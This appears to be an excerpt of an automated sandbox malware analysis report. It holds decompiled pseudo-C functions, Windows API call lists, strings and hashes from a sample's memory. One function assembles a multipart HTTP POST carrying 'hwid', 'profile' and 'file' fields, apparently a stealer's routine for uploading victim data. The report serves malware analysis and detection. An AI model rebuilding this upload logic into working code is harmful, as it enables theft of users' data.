                                                                                					if(lstrcmpiW( *(_t16 + 0x28), _a4) == 0) {
                                                                                						_t13 = 1;
                                                                                					} else {
                                                                                						_t16 =  *_t16;
                                                                                						continue;
                                                                                					}
                                                                                					L5:
                                                                                					return _t13;
                                                                                				}
                                                                                				_t13 = 0;
                                                                                				goto L5;
                                                                                			}








                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 1586166983-0
                                                                                • Opcode ID: e9359936c10f8ac918efdde15a03defa36e9a40a5e2c930e284f521e147bf3fe
                                                                                • Instruction ID: 35dd3cdcdbb2c094024535e1c2f5891a0eb7d1e2b3620cf173f4ee0af18b18b5
                                                                                • Opcode Fuzzy Hash: e9359936c10f8ac918efdde15a03defa36e9a40a5e2c930e284f521e147bf3fe
                                                                                • Instruction Fuzzy Hash: 86F0EC32A00240EBCF20CF18C800BAAFBB8EB43360F213066E404B3650C338ED41EA9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: db4157b6f875e50ad0999775a506b9c38830dca3911d7453a5f1329d5aac1a19
                                                                                • Instruction ID: f65cf7065854efaf78d3b0bad71e21d60e3e4e83c6364bec3b43d1ccc3cb79b8
                                                                                • Opcode Fuzzy Hash: db4157b6f875e50ad0999775a506b9c38830dca3911d7453a5f1329d5aac1a19
                                                                                • Instruction Fuzzy Hash: CFC02B11562B37CC1333267646534CCF98264371700BC0305C3AB050EC53944000AF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040E86D
                                                                                • _memset.LIBCMT ref: 0040E880
                                                                                • _memset.LIBCMT ref: 0040E892
                                                                                • GetProcessHeap.KERNEL32(00000000,00800000,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040E8A0
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040E8A7
                                                                                • _memset.LIBCMT ref: 0040E8B9
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E8C9
                                                                                • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040E8E2
                                                                                • StrCmpCA.SHLWAPI(http://,https://,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040E8FC
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040E92F
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040E94C
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040E95B
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040E96B
                                                                                • lstrcat.KERNEL32(?,00441268), ref: 0040E979
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040E983
                                                                                • lstrcat.KERNEL32(?,Content-Type: multipart/form-data; boundary=----), ref: 0040E995
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040E9A9
                                                                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0040E9C9
                                                                                • HttpOpenRequestA.WININET(?,POST,00440EC8,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 0040EA00
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EA19
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EA2D
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EA3B
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EA4D
                                                                                • lstrcat.KERNEL32(?,profile), ref: 0040EA5F
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EA71
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EA81
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EA8F
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EA9D
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EAB1
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EABF
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EAD1
                                                                                • lstrcat.KERNEL32(?,profile_id), ref: 0040EAE3
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EAF5
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EB05
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EB13
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EB21
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EB35
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EB43
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EB55
                                                                                • lstrcat.KERNEL32(?,hwid), ref: 0040EB67
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EB79
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EB89
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EB97
                                                                                • lstrcat.KERNEL32(?,------), ref: 0040EBA5
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EBB9
                                                                                • lstrcat.KERNEL32(?,0044125C), ref: 0040EBC7
                                                                                • lstrcat.KERNEL32(?,Content-Disposition: form-data; name="), ref: 0040EBD9
                                                                                • lstrcat.KERNEL32(?,file), ref: 0040EBEB
                                                                                • lstrcat.KERNEL32(?,"), ref: 0040EBFD
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC06
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC15
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC22
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC29
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,4124C941,00000000,00000010,00000000), ref: 0040EC38
                                                                                • _memmove.LIBCMT ref: 0040EC47
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,4124C941,00000000), ref: 0040EC5C
                                                                                • _memmove.LIBCMT ref: 0040EC65
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,4124C941), ref: 0040EC70
                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040EC81
                                                                                • _memmove.LIBCMT ref: 0040EC8D
                                                                                • lstrlenA.KERNEL32(?,00000000,?), ref: 0040ECA1
                                                                                • HttpSendRequestA.WININET(?,?,00000000), ref: 0040ECB2
                                                                                • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040ECC9
                                                                                • StrCmpCA.SHLWAPI(?,200), ref: 0040ECDF
                                                                                • Sleep.KERNEL32(00007530), ref: 0040ECEE
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040ED1D
                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040ED32
                                                                                • InternetCloseHandle.WININET(?), ref: 0040ED3F
                                                                                • InternetCloseHandle.WININET(?), ref: 0040ED48
                                                                                • InternetCloseHandle.WININET(?), ref: 0040ED51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$Internetlstrlen$Heap_memset$CloseHandleHttp_memmove$AllocOpenProcessRequest$ConnectFileInfoOptionQueryReadSendSleep
                                                                                • String ID: "$------$200$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$HTTP/1.1$POST$file$http://$https://$hwid$profile$profile_id
                                                                                • API String ID: 1373257564-4008767662
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0041221B(void* __ebx, long* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t148;
                                                                                				void* _t157;
                                                                                				intOrPtr _t159;
                                                                                				void* _t166;
                                                                                				long* _t170;
                                                                                				long _t176;
                                                                                				void* _t178;
                                                                                				intOrPtr* _t182;
                                                                                				void* _t186;
                                                                                				long _t189;
                                                                                				void* _t191;
                                                                                				void* _t206;
                                                                                				void* _t214;
                                                                                				void* _t227;
                                                                                				void* _t234;
                                                                                				void* _t240;
                                                                                				long _t245;
                                                                                				void* _t246;
                                                                                				void* _t274;
                                                                                				long* _t276;
                                                                                				void* _t277;
                                                                                				long _t281;
                                                                                				void* _t282;
                                                                                				void* _t283;
                                                                                				void* _t285;
                                                                                				signed int _t292;
                                                                                				void* _t294;
                                                                                				void* _t295;
                                                                                				void* _t296;
                                                                                				void* _t298;
                                                                                				void* _t299;
                                                                                				void* _t300;
                                                                                				void* _t301;
                                                                                				void* _t302;
                                                                                
                                                                                				_t302 = __eflags;
                                                                                				_t274 = __edx;
                                                                                				_t295 = _t294 - 0x70;
                                                                                				_t292 = _t295 - 4;
                                                                                				_t148 =  *0x447674; // 0x4124c941
                                                                                				 *(_t292 + 0x70) = _t148 ^ _t292;
                                                                                				_push(0x28);
                                                                                				E00421975(E0043668C, __ebx, __edi, __esi);
                                                                                				_t245 = 0;
                                                                                				 *((intOrPtr*)(_t292 - 0x34)) =  *((intOrPtr*)(_t292 + 0x7c));
                                                                                				_t276 = __ecx;
                                                                                				_t281 = 0xf;
                                                                                				 *((intOrPtr*)(_t292 - 0x30)) =  *((intOrPtr*)(_t292 + 0x80));
                                                                                				 *(_t292 - 0x20) = __ecx;
                                                                                				 *((intOrPtr*)(_t292 - 0x2c)) = 0;
                                                                                				 *(_t292 - 0x10) = 0;
                                                                                				 *(_t292 - 0x14) = 0;
                                                                                				 *(_t292 + 0x68) = _t281;
                                                                                				 *((intOrPtr*)(_t292 + 0x64)) = 0;
                                                                                				 *((char*)(_t292 + 0x54)) = 0;
                                                                                				 *((intOrPtr*)(_t292 - 4)) = 0;
                                                                                				 *(_t292 + 0x4c) = _t281;
                                                                                				 *((intOrPtr*)(_t292 + 0x48)) = 0;
                                                                                				 *((char*)(_t292 + 0x38)) = 0;
                                                                                				_push(_t292 - 0x14);
                                                                                				_push( *((intOrPtr*)(_t292 + 0x84)));
                                                                                				 *((char*)(_t292 - 4)) = 1;
                                                                                				 *((intOrPtr*)(_t292 - 0x28)) = E00412108(0, _t292 - 0x10, __ecx, _t281, _t302);
                                                                                				_t157 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                				 *(_t292 - 0x18) = _t157;
                                                                                				if(_t157 != 0) {
                                                                                					E0041E985(_t157,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                					_t296 = _t295 + 0xc;
                                                                                					__eflags =  *(_t292 - 0x10);
                                                                                					if( *(_t292 - 0x10) == 0) {
                                                                                						_t282 = HeapFree;
                                                                                					} else {
                                                                                						_t240 = GetProcessHeap();
                                                                                						_t282 = HeapFree;
                                                                                						HeapFree(_t240, 0,  *(_t292 - 0x10));
                                                                                						 *(_t292 - 0x10) = 0;
                                                                                					}
                                                                                					_t159 =  *((intOrPtr*)(_t292 - 0x28));
                                                                                					__eflags = _t159 - 0xff;
                                                                                					if(__eflags != 0) {
                                                                                						 *((intOrPtr*)(_t292 - 0x24)) = _t159;
                                                                                						goto L20;
                                                                                					} else {
                                                                                						_push(_t292 - 0x14);
                                                                                						_push( *(_t292 - 0x18));
                                                                                						E00412108(_t245, _t292 - 0x10, _t276, _t282, __eflags);
                                                                                						HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                						_t227 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                						 *(_t292 - 0x18) = _t227;
                                                                                						__eflags = _t227 - _t245;
                                                                                						if(_t227 != _t245) {
                                                                                							E0041E985(_t227,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                							_t301 = _t296 + 0xc;
                                                                                							__eflags =  *(_t292 - 0x10) - _t245;
                                                                                							if(__eflags != 0) {
                                                                                								HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                								 *(_t292 - 0x10) = _t245;
                                                                                							}
                                                                                							_push(_t292 - 0x14);
                                                                                							_push( *(_t292 - 0x18));
                                                                                							 *((intOrPtr*)(_t292 - 0x24)) = E00412108(_t245, _t292 - 0x10, _t276, _t282, __eflags);
                                                                                							HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                							_t234 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                							 *(_t292 - 0x18) = _t234;
                                                                                							__eflags = _t234 - _t245;
                                                                                							if(_t234 == _t245) {
                                                                                								goto L10;
                                                                                							} else {
                                                                                								E0041E985(_t234,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                								_t296 = _t301 + 0xc;
                                                                                								__eflags =  *(_t292 - 0x10) - _t245;
                                                                                								if(__eflags != 0) {
                                                                                									HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                									 *(_t292 - 0x10) = _t245;
                                                                                								}
                                                                                								L20:
                                                                                								_push(_t292 - 0x14);
                                                                                								_push( *(_t292 - 0x18));
                                                                                								 *(_t292 - 0x1c) = E00412108(_t245, _t292 - 0x10, _t276, _t282, __eflags) + _t161;
                                                                                								HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                								_t166 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                								 *(_t292 - 0x18) = _t166;
                                                                                								__eflags = _t166 - _t245;
                                                                                								if(_t166 == _t245) {
                                                                                									goto L10;
                                                                                								}
                                                                                								E0041E985(_t166,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                								_t298 = _t296 + 0xc;
                                                                                								__eflags =  *(_t292 - 0x10) - _t245;
                                                                                								if( *(_t292 - 0x10) != _t245) {
                                                                                									HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                								}
                                                                                								_t176 = lstrlenA( *(_t292 - 0x18)) + 1 -  *(_t292 - 0x1c);
                                                                                								 *(_t292 - 0x14) = _t176;
                                                                                								_t178 = HeapAlloc(GetProcessHeap(), 8, _t176);
                                                                                								 *(_t292 - 0x10) = _t178;
                                                                                								__eflags = _t178 - _t245;
                                                                                								if(_t178 == _t245) {
                                                                                									L13:
                                                                                									_t276[5] = 0xf;
                                                                                									L4:
                                                                                									_t276[4] = _t245;
                                                                                									 *_t276 = _t245;
                                                                                									E0040381A(_t276, 0x43e028);
                                                                                									E00402C34(_t292 + 0x38, 1, _t245);
                                                                                									E00402C34(_t292 + 0x54, 1, _t245);
                                                                                									_t170 = _t276;
                                                                                									goto L35;
                                                                                								} else {
                                                                                									 *(_t292 + 0x30) = 0xf;
                                                                                									 *(_t292 + 0x2c) = _t245;
                                                                                									 *(_t292 + 0x1c) = _t245;
                                                                                									E0040381A(_t292 + 0x1c,  *(_t292 - 0x18));
                                                                                									 *((char*)(_t292 - 4)) = 2;
                                                                                									_t182 = E0040C689(_t292 + 0x1c, _t292, _t292 + 0x1c,  *(_t292 - 0x1c), lstrlenA( *(_t292 - 0x18)));
                                                                                									__eflags =  *((intOrPtr*)(_t182 + 0x14)) - 0x10;
                                                                                									if( *((intOrPtr*)(_t182 + 0x14)) >= 0x10) {
                                                                                										_t182 =  *_t182;
                                                                                									}
                                                                                									E0041E985( *(_t292 - 0x10),  *(_t292 - 0x14), _t182);
                                                                                									_t299 = _t298 + 0xc;
                                                                                									E00402C34(_t292, 1, _t245);
                                                                                									 *((char*)(_t292 - 4)) = 1;
                                                                                									E00402C34(_t292 + 0x1c, 1, _t245);
                                                                                									_t186 = GetProcessHeap();
                                                                                									_t285 = HeapFree;
                                                                                									HeapFree(_t186, _t245,  *(_t292 - 0x18));
                                                                                									_t189 = lstrlenA( *(_t292 - 0x10)) + 1;
                                                                                									 *(_t292 - 0x14) = _t189;
                                                                                									_t191 = HeapAlloc(GetProcessHeap(), 8, _t189);
                                                                                									_push( *(_t292 - 0x10));
                                                                                									 *(_t292 - 0x18) = _t191;
                                                                                									__eflags = _t191 - _t245;
                                                                                									if(_t191 == _t245) {
                                                                                										L12:
                                                                                										HeapFree(GetProcessHeap(), _t245, ??);
                                                                                										goto L13;
                                                                                									} else {
                                                                                										_push( *(_t292 - 0x14));
                                                                                										_push(_t191);
                                                                                										E0041E985();
                                                                                										_t300 = _t299 + 0xc;
                                                                                										HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                										 *(_t292 - 0x10) = _t245;
                                                                                										 *(_t292 - 0x1c) = _t245;
                                                                                										__eflags =  *((intOrPtr*)(_t292 - 0x24)) - _t245;
                                                                                										if(__eflags <= 0) {
                                                                                											L32:
                                                                                											__eflags =  *((intOrPtr*)(_t292 - 0x28)) - 0xff;
                                                                                											if( *((intOrPtr*)(_t292 - 0x28)) == 0xff) {
                                                                                												 *(_t292 + 0x30) = 0xf;
                                                                                												 *(_t292 + 0x2c) = _t245;
                                                                                												 *(_t292 + 0x1c) = _t245;
                                                                                												E0040381A(_t292 + 0x1c,  *((intOrPtr*)(_t292 - 0x34)));
                                                                                												 *((char*)(_t292 - 4)) = 3;
                                                                                												E0040CFB8(_t292 + 0x38, _t292 + 0x1c);
                                                                                												 *((char*)(_t292 - 4)) = 1;
                                                                                												E00402C34(_t292 + 0x1c, 1, _t245);
                                                                                												E0040C640(_t292 + 0x38,  *((intOrPtr*)(_t292 - 0x30)));
                                                                                												_t206 = E0040C689(_t292 + 0x1c, _t292, _t292 + 0x54,  *((intOrPtr*)(_t292 + 0x48)),  *((intOrPtr*)(_t292 + 0x64)));
                                                                                												 *((char*)(_t292 - 4)) = 4;
                                                                                												E0040CFB8(_t292 + 0x54, _t206);
                                                                                												 *((char*)(_t292 - 4)) = 1;
                                                                                												E00402C34(_t292, 1, _t245);
                                                                                												_t276 =  *(_t292 - 0x20);
                                                                                											}
                                                                                											HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                											_t276[5] = 0xf;
                                                                                											_t276[4] = _t245;
                                                                                											 *_t276 = _t245;
                                                                                											E0040CFB8(_t276, _t292 + 0x54);
                                                                                											E00402C34(_t292 + 0x38, 1, _t245);
                                                                                											E00402C34(_t292 + 0x54, 1, _t245);
                                                                                											_t170 =  *(_t292 - 0x20);
                                                                                											L35:
                                                                                											 *[fs:0x0] =  *((intOrPtr*)(_t292 - 0xc));
                                                                                											_pop(_t277);
                                                                                											_pop(_t283);
                                                                                											_pop(_t246);
                                                                                											return E0041DEB4(_t170, _t246,  *(_t292 + 0x70) ^ _t292, _t274, _t277, _t283);
                                                                                										} else {
                                                                                											goto L28;
                                                                                										}
                                                                                										while(1) {
                                                                                											L28:
                                                                                											_push(_t292 - 0x14);
                                                                                											_push( *(_t292 - 0x18));
                                                                                											_t271 = _t292 - 0x10;
                                                                                											 *((intOrPtr*)(_t292 - 0x2c)) = E00412108(_t245, _t292 - 0x10, _t276, _t285, __eflags);
                                                                                											HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x18));
                                                                                											_t214 = HeapAlloc(GetProcessHeap(), 8,  *(_t292 - 0x14));
                                                                                											 *(_t292 - 0x18) = _t214;
                                                                                											__eflags = _t214 - _t245;
                                                                                											if(_t214 == _t245) {
                                                                                												goto L10;
                                                                                											}
                                                                                											E0041E985(_t214,  *(_t292 - 0x14),  *(_t292 - 0x10));
                                                                                											_t300 = _t300 + 0xc;
                                                                                											__eflags =  *(_t292 - 0x10) - _t245;
                                                                                											if( *(_t292 - 0x10) != _t245) {
                                                                                												HeapFree(GetProcessHeap(), _t245,  *(_t292 - 0x10));
                                                                                												 *(_t292 - 0x10) = _t245;
                                                                                											}
                                                                                											E0040D70E(1, _t271, _t292 + 0x54, _t292,  *((intOrPtr*)(_t292 - 0x2c)));
                                                                                											 *(_t292 - 0x1c) =  *(_t292 - 0x1c) + 1;
                                                                                											_t276 =  *(_t292 - 0x20);
                                                                                											_t285 = HeapFree;
                                                                                											_t245 = 0;
                                                                                											__eflags =  *(_t292 - 0x1c) -  *((intOrPtr*)(_t292 - 0x24));
                                                                                											if(__eflags < 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L32;
                                                                                											}
                                                                                										}
                                                                                										goto L10;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L10:
                                                                                						__eflags =  *(_t292 - 0x10) - _t245;
                                                                                						if( *(_t292 - 0x10) == _t245) {
                                                                                							goto L13;
                                                                                						}
                                                                                						_push( *(_t292 - 0x10));
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				if( *(_t292 - 0x10) != 0) {
                                                                                					HeapFree(GetProcessHeap(), 0,  *(_t292 - 0x10));
                                                                                				}
                                                                                				_t276[5] = _t281;
                                                                                				goto L4;
                                                                                			}







































                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00412234
                                                                                  • Part of subcall function 00412108: __EH_prolog3_GS.LIBCMT ref: 0041210F
                                                                                  • Part of subcall function 00412108: lstrlenA.KERNEL32(?,0000005C,00412287,?,?,00000028), ref: 00412133
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,00000028), ref: 0041228F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412296
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004122AC
                                                                                • HeapFree.KERNEL32(00000000), ref: 004122B3
                                                                                • _strcpy_s.LIBCMT ref: 004122F1
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412302
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041230F
                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,00000008,?), ref: 0041233D
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412344
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 0041234B
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412352
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412368
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041236F
                                                                                • _strcpy_s.LIBCMT ref: 00412384
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412395
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041239C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,00000008,?), ref: 004123B7
                                                                                • HeapFree.KERNEL32(00000000), ref: 004123BE
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 004123C5
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004123CC
                                                                                • _strcpy_s.LIBCMT ref: 004123E0
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004123F1
                                                                                • HeapFree.KERNEL32(00000000), ref: 004123F8
                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,00000008,?), ref: 0041241A
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412421
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00412428
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0041242F
                                                                                • _strcpy_s.LIBCMT ref: 00412447
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412458
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041245F
                                                                                • lstrlenA.KERNEL32(00000008), ref: 00412464
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00412478
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0041247F
                                                                                • lstrlenA.KERNEL32(00000008,00000008), ref: 004124AF
                                                                                • _strcpy_s.LIBCMT ref: 004124D4
                                                                                • GetProcessHeap.KERNEL32(00000000,00000010,00000001,00000000,00000001,00000000,?,?,00000000), ref: 004124FA
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412507
                                                                                • lstrlenA.KERNEL32(?), ref: 0041250C
                                                                                • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00412519
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412520
                                                                                • _strcpy_s.LIBCMT ref: 00412538
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00412544
                                                                                • HeapFree.KERNEL32(00000000), ref: 0041254B
                                                                                • GetProcessHeap.KERNEL32(00000000,00000010,00000010,?), ref: 00412572
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412579
                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00412580
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00412587
                                                                                • _strcpy_s.LIBCMT ref: 0041259F
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004125B0
                                                                                • GetProcessHeap.KERNEL32(00000000,00000010), ref: 00412669
                                                                                • HeapFree.KERNEL32(00000000), ref: 00412670
                                                                                • HeapFree.KERNEL32(00000000), ref: 004125B7
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free$Alloc_strcpy_s$lstrlen$_memmove$H_prolog3H_prolog3_
                                                                                • String ID:
                                                                                • API String ID: 1785655924-0
                                                                                • Opcode ID: 3780e6f1472f5d67fb6b1c600a7c9fb20c36228bce19c6752e58691872dc19f2
                                                                                • Instruction ID: 953d4677fb6be6a824796c0e113d08cd095a76d61cffae8afb22d791519e0cc5
                                                                                • Opcode Fuzzy Hash: 3780e6f1472f5d67fb6b1c600a7c9fb20c36228bce19c6752e58691872dc19f2
                                                                                • Instruction Fuzzy Hash: 54E119B5C0025AAFDF04EFE5CD499EEBB79FF09304F00042AFA11A2251D7795994CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E004126BD(void* __ebx, void* __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t114;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t147;
                                                                                				long _t151;
                                                                                				intOrPtr* _t155;
                                                                                				void* _t177;
                                                                                				intOrPtr _t180;
                                                                                				void* _t186;
                                                                                				void* _t188;
                                                                                				void* _t189;
                                                                                				void* _t193;
                                                                                				void* _t195;
                                                                                				void* _t196;
                                                                                
                                                                                				_t178 = __edi;
                                                                                				_t177 = __edx;
                                                                                				_push(0xdac);
                                                                                				E004219DE(E00437349, __ebx, __edi, __esi);
                                                                                				 *(_t188 - 0xd9c) = 0;
                                                                                				 *(_t188 - 0x11c) = 0;
                                                                                				E00427E30(_t188 - 0x11b, 0, 0x103);
                                                                                				 *(_t188 - 0xd94) = 0x104;
                                                                                				 *((char*)(_t188 - 0x51c)) = 0;
                                                                                				E00427E30(_t188 - 0x51b, 0, 0x3ff);
                                                                                				 *((char*)(_t188 - 0x91c)) = 0;
                                                                                				E00427E30(_t188 - 0x91b, 0, 0x3ff);
                                                                                				 *((char*)(_t188 - 0xd1c)) = 0;
                                                                                				E00427E30(_t188 - 0xd1b, 0, 0x3ff);
                                                                                				_t193 = _t189 + 0x30;
                                                                                				 *((intOrPtr*)(_t188 - 0xdb4)) = 0x400;
